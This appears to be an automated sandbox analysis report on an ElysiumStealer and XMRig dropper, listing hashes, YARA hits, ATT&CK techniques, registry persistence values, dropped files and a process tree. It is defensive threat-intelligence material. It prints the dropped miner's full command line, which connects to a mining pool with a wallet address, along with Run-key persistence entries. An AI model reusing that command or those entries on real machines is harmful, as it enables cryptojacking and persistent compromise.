elysiumstealer | c089f4a7b15f47edfe5c4748b2f34e8962bf115e6980355d67036be35c982eb1

Analysis

max time kernel
1800s
max time network
1750s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BTRSetp.exe
Size

258KB
MD5

1165ce455c6ff9ad6c27e49a8094b069
SHA1

3ba061200d28f39ce95a2d493d26c8eb54160e85
SHA256

c089f4a7b15f47edfe5c4748b2f34e8962bf115e6980355d67036be35c982eb1
SHA512

dfa4109f3c0a6368c309ccfa0449823ad6388d122f9161e78044b48890126e26a1cfc36666f20b9800ac3ac6ced02c1132b40bb9131f5d6a5685ad5ec5a529a4

Score

10^/10

elysiumstealer xmrig discovery evasion miner persistence spyware stealer themida trojan

Malware Config

Signatures

ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
stealer elysiumstealer

ElysiumStealer Payload 3 IoCs

Processes:

resource	yara_rule
C:\ProgramData\2531046.27	elysiumstealer
C:\ProgramData\2531046.27	elysiumstealer
behavioral4/memory/1992-50-0x00000000048F0000-0x00000000048F6000-memory.dmp	elysiumstealer

ElysiumStealer Support DLL 1 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll	elysiumstealer_dll

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral4/memory/820-74-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

1177383.121648170.188013969.882531046.27Windows Host.exeDriver.exe

pid process

2256 1177383.12
2616 1648170.18
576 8013969.88
1992 2531046.27
2736 Windows Host.exe
820 Driver.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

8013969.88

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8013969.88
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8013969.88

Drops startup file 1 IoCs

Processes:

8013969.88

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 8013969.88
Loads dropped DLL 1 IoCs

Processes:

2531046.27

pid process

1992 2531046.27
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	8013969.88

pid	process
1992	2531046.27

themida 3 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\8013969.88	themida
C:\ProgramData\8013969.88	themida
behavioral4/memory/576-45-0x0000000000230000-0x0000000000231000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

8013969.881648170.18

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\8013969.88"	8013969.88
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	1648170.18

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

8013969.88

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8013969.88
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

8013969.88

pid process

576 8013969.88
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8013969.88

pid	process
576	8013969.88

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1177383.122531046.278013969.88

pid	process
2256	1177383.12
1992	2531046.27
2256	1177383.12
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88
576	8013969.88

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

BTRSetp.exe1177383.128013969.882531046.27Driver.exe

description	pid	process
Token: SeDebugPrivilege	984	BTRSetp.exe
Token: SeDebugPrivilege	2256	1177383.12
Token: SeDebugPrivilege	576	8013969.88
Token: SeDebugPrivilege	1992	2531046.27
Token: SeLockMemoryPrivilege	820	Driver.exe
Token: SeLockMemoryPrivilege	820	Driver.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

BTRSetp.exe1648170.188013969.88

description	pid	process	target process
PID 984 wrote to memory of 2256	984	BTRSetp.exe	1177383.12
PID 984 wrote to memory of 2256	984	BTRSetp.exe	1177383.12
PID 984 wrote to memory of 2256	984	BTRSetp.exe	1177383.12
PID 984 wrote to memory of 2616	984	BTRSetp.exe	1648170.18
PID 984 wrote to memory of 2616	984	BTRSetp.exe	1648170.18
PID 984 wrote to memory of 2616	984	BTRSetp.exe	1648170.18
PID 984 wrote to memory of 576	984	BTRSetp.exe	8013969.88
PID 984 wrote to memory of 576	984	BTRSetp.exe	8013969.88
PID 984 wrote to memory of 576	984	BTRSetp.exe	8013969.88
PID 984 wrote to memory of 1992	984	BTRSetp.exe	2531046.27
PID 984 wrote to memory of 1992	984	BTRSetp.exe	2531046.27
PID 984 wrote to memory of 1992	984	BTRSetp.exe	2531046.27
PID 2616 wrote to memory of 2736	2616	1648170.18	Windows Host.exe
PID 2616 wrote to memory of 2736	2616	1648170.18	Windows Host.exe
PID 2616 wrote to memory of 2736	2616	1648170.18	Windows Host.exe
PID 576 wrote to memory of 820	576	8013969.88	Driver.exe
PID 576 wrote to memory of 820	576	8013969.88	Driver.exe

C:\Users\Admin\AppData\Local\Temp\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\BTRSetp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:984

C:\ProgramData\1177383.12
"C:\ProgramData\1177383.12"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\ProgramData\1648170.18
"C:\ProgramData\1648170.18"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2616

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
3⤵
- Executes dropped EXE
PID:2736

C:\ProgramData\8013969.88
"C:\ProgramData\8013969.88"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\ProgramData\2531046.27
"C:\ProgramData\2531046.27"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1177383.12
MD5
2586f08dfe627ea31b60e5d95abf6e73

SHA1
413320766fcc45a353c4d6c68647b48600580575

SHA256
3307ac37e52543cc7fa8e86732aade60a666eabcb47d5337378c7f11d5636480

SHA512
851bf6a564dd4d53af408324edb6db7fdf7491ef08a71057733ca7cfa5df7f9a1145adfddb49b6cc7aa8418ec56e4d8e9a8bd1c29a26f9f2e2147e66f56ce81a

Download Submit
C:\ProgramData\1177383.12
MD5
2586f08dfe627ea31b60e5d95abf6e73

SHA1
413320766fcc45a353c4d6c68647b48600580575

SHA256
3307ac37e52543cc7fa8e86732aade60a666eabcb47d5337378c7f11d5636480

SHA512
851bf6a564dd4d53af408324edb6db7fdf7491ef08a71057733ca7cfa5df7f9a1145adfddb49b6cc7aa8418ec56e4d8e9a8bd1c29a26f9f2e2147e66f56ce81a

Download Submit
C:\ProgramData\1648170.18
MD5
f7a040bef124bb5716718b77c788cbf4

SHA1
0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

SHA256
2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

SHA512
bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

Download Submit
C:\ProgramData\1648170.18
MD5
f7a040bef124bb5716718b77c788cbf4

SHA1
0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

SHA256
2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

SHA512
bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

Download Submit
C:\ProgramData\2531046.27
MD5
02d586b2b772f5bf3ff9068d03a7f9c1

SHA1
64f09d1f6ae801bfda1f782a14dcb08c1a2518f7

SHA256
a078e95bd8f961433ccb7465a866efffa4e1d23c6c1dceece246928133762bc9

SHA512
3c927b3b2b0b29b3f4ba06eaa18159e51ec4d1b45bbaae54f7a7bc37428b89127c8c6e14515be1221cbe938bc5adc5efd0fc77d855c8da52e5a6e4a0531cc993

Download Submit
C:\ProgramData\2531046.27
MD5
02d586b2b772f5bf3ff9068d03a7f9c1

SHA1
64f09d1f6ae801bfda1f782a14dcb08c1a2518f7

SHA256
a078e95bd8f961433ccb7465a866efffa4e1d23c6c1dceece246928133762bc9

SHA512
3c927b3b2b0b29b3f4ba06eaa18159e51ec4d1b45bbaae54f7a7bc37428b89127c8c6e14515be1221cbe938bc5adc5efd0fc77d855c8da52e5a6e4a0531cc993

Download Submit
C:\ProgramData\8013969.88
MD5
880fd252bc4e801e6170002efb6aef4d

SHA1
b10c102503f73acc57fc14326108e300fa94f8f5

SHA256
9157304786300c4f67a767995b5432d524e18243642c8dc5f96a44b4792ae911

SHA512
91071cd35e463d06f42c1cfb80be89a4fb8749f4936e699080ff0088281a3483c03f19beefd8f9ab403364475327e15b5ee65162a917f7a47b162a8105fc40a2

Download Submit
C:\ProgramData\8013969.88
MD5
880fd252bc4e801e6170002efb6aef4d

SHA1
b10c102503f73acc57fc14326108e300fa94f8f5

SHA256
9157304786300c4f67a767995b5432d524e18243642c8dc5f96a44b4792ae911

SHA512
91071cd35e463d06f42c1cfb80be89a4fb8749f4936e699080ff0088281a3483c03f19beefd8f9ab403364475327e15b5ee65162a917f7a47b162a8105fc40a2

Download Submit
C:\ProgramData\Windows Host\Windows Host.exe
MD5
f7a040bef124bb5716718b77c788cbf4

SHA1
0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

SHA256
2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

SHA512
bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

Download Submit
C:\ProgramData\Windows Host\Windows Host.exe
MD5
f7a040bef124bb5716718b77c788cbf4

SHA1
0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

SHA256
2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

SHA512
bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
\Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll
MD5
94173de2e35aa8d621fc1c4f54b2a082

SHA1
fbb2266ee47f88462560f0370edb329554cd5869

SHA256
7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f

SHA512
cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798

Download Submit
memory/576-45-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/576-44-0x0000000073800000-0x0000000073EEE000-memory.dmp

Filesize
6.9MB

Download
memory/576-32-0x0000000077634000-0x0000000077635000-memory.dmp

Filesize
4KB

Download
memory/576-72-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/576-22-0x0000000000000000-mapping.dmp

Download
memory/820-69-0x0000000000000000-mapping.dmp

Download
memory/820-75-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/820-76-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/820-73-0x00000000001B0000-0x00000000001C4000-memory.dmp

Filesize
80KB

Download
memory/820-74-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/984-5-0x0000000000D90000-0x0000000000D91000-memory.dmp

Filesize
4KB

Download
memory/984-6-0x0000000002580000-0x00000000025B3000-memory.dmp

Filesize
204KB

Download
memory/984-16-0x000000001B130000-0x000000001B132000-memory.dmp

Filesize
8KB

Download
memory/984-2-0x00007FF901620000-0x00007FF90200C000-memory.dmp

Filesize
9.9MB

Download
memory/984-7-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

Filesize
4KB

Download
memory/984-3-0x0000000000560000-0x0000000000561000-memory.dmp

Filesize
4KB

Download
memory/1992-50-0x00000000048F0000-0x00000000048F6000-memory.dmp

Filesize
24KB

Download
memory/1992-40-0x0000000073800000-0x0000000073EEE000-memory.dmp

Filesize
6.9MB

Download
memory/1992-51-0x00000000048E0000-0x00000000048E1000-memory.dmp

Filesize
4KB

Download
memory/1992-36-0x0000000000000000-mapping.dmp

Download
memory/1992-61-0x0000000005660000-0x0000000005661000-memory.dmp

Filesize
4KB

Download
memory/1992-46-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/1992-66-0x0000000005E10000-0x0000000005E11000-memory.dmp

Filesize
4KB

Download
memory/2256-15-0x0000000073800000-0x0000000073EEE000-memory.dmp

Filesize
6.9MB

Download
memory/2256-21-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/2256-8-0x0000000000000000-mapping.dmp

Download
memory/2256-35-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/2256-33-0x00000000026F0000-0x0000000002724000-memory.dmp

Filesize
208KB

Download
memory/2256-31-0x0000000004D50000-0x0000000004D51000-memory.dmp

Filesize
4KB

Download
memory/2256-17-0x00000000005D0000-0x00000000005D1000-memory.dmp

Filesize
4KB

Download
memory/2616-28-0x000000000AA10000-0x000000000AA11000-memory.dmp

Filesize
4KB

Download
memory/2616-27-0x000000000AE70000-0x000000000AE71000-memory.dmp

Filesize
4KB

Download
memory/2616-26-0x0000000005540000-0x000000000554D000-memory.dmp

Filesize
52KB

Download
memory/2616-23-0x00000000053D0000-0x00000000053D1000-memory.dmp

Filesize
4KB

Download
memory/2616-14-0x0000000073800000-0x0000000073EEE000-memory.dmp

Filesize
6.9MB

Download
memory/2616-19-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/2616-29-0x00000000055D0000-0x00000000055D1000-memory.dmp

Filesize
4KB

Download
memory/2616-11-0x0000000000000000-mapping.dmp

Download
memory/2736-59-0x000000000A620000-0x000000000A621000-memory.dmp

Filesize
4KB

Download
memory/2736-60-0x0000000004C60000-0x0000000004C61000-memory.dmp

Filesize
4KB

Download
memory/2736-43-0x0000000073800000-0x0000000073EEE000-memory.dmp

Filesize
6.9MB

Download
memory/2736-38-0x0000000000000000-mapping.dmp

Download